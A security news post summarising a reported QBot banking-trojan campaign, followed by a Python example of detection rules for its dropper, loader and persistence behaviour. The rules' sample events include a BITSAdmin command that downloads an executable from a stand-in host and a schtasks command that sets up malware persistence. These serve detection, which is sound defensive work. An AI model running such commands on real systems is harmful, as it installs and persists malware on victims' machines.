Only a month has passed since the last distribution campaign of the QBot malware (also known as the QakBot banking trojan), and a new modification is again attacking companies in Europe and the USA. Security researchers at Varonis discovered a wave of phishing attacks using a new incarnation of the infamous trojan. The adversaries retained QBot's polymorphic features to avoid detection and added two infection vectors. The malware is now distributed via an archived VBS file, which uses the BITSAdmin tool to drop the malware loader. The researchers found that each version of the loader is signed with a different digital certificate. To ensure it persists on an attacked system, the malware copies itself to a randomly created folder in %Appdata%\Roaming\, schedules a task to execute itself every 5 hours, and creates an LNK file in the Startup folder. When executed, the loader starts a new explorer.exe process and injects QBot into it. In addition to its traditional functions, the trojan conducts a brute-force attack targeting network accounts from the Active Directory Domain Users group.
According to the published report, about 90% of infected systems are located in the United States. The threat actors behind the campaign use a number of C&C servers to which the stolen information is sent. It is also known that Windows Defender is installed on almost all infected systems. Recently, more and more malware families have been using BITSAdmin in the infection process.
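The behaviours described above (a VBS script invoking BITSAdmin, a binary in %Appdata%\Roaming\ starting explorer.exe, and a scheduled task pointing back into that folder) can be expressed as triage rules over process-creation events. This is an added example, not code from the Varonis report or from this post; the event fields, sample events and rule names are constructed for illustration, and registering the task through schtasks.exe is an assumption.

```python
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
ROAMING = re.compile(r"\\appdata\\roaming\\", re.IGNORECASE)
BITS_JOB = re.compile(r"/(transfer|addfile)\b", re.IGNORECASE)

def classify(event):
    """Return the names of the rules a process-creation event matches."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    cmd = event["command_line"]
    hits = []
    # VBS dropper: a script host launching BITSAdmin to fetch a file.
    if image == "bitsadmin.exe" and parent in SCRIPT_HOSTS and BITS_JOB.search(cmd):
        hits.append("bits_download_from_script")
    # Loader: a binary under AppData\Roaming starting a new explorer.exe.
    if image == "explorer.exe" and ROAMING.search(event["parent_image"]):
        hits.append("explorer_child_of_roaming_binary")
    # Persistence: task creation whose command line points into AppData\Roaming.
    # Assumption: the task is registered via schtasks.exe (the report does not say).
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and ROAMING.search(cmd):
        hits.append("task_runs_roaming_binary")
    return hits

# Constructed sample events (hypothetical field names, paths and URL).
EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"bitsadmin /transfer job1 /download http://example.invalid/a.png C:\Users\u\AppData\Local\Temp\a.exe"},
    {"image": r"C:\Windows\explorer.exe", "parent_image": r"C:\Users\u\AppData\Roaming\Kxqzt\kxqzt.exe",
     "command_line": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Users\u\AppData\Roaming\Kxqzt\kxqzt.exe",
     "command_line": r'schtasks /create /tn upd /tr "C:\Users\u\AppData\Roaming\Kxqzt\kxqzt.exe" /sc hourly /mo 5'},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"bitsadmin /list"},
    {"image": r"C:\Windows\explorer.exe", "parent_image": r"C:\Windows\System32\userinit.exe",
     "command_line": r"C:\Windows\explorer.exe"},
]

def triage(events):
    """Map event index to matched rule names, skipping events with no hits."""
    scored = ((i, classify(e)) for i, e in enumerate(events))
    return {i: hits for i, hits in scored if hits}
```

Because each loader build carries a different certificate and the binary is polymorphic, these rules key on process lineage and paths rather than on hashes or signer names.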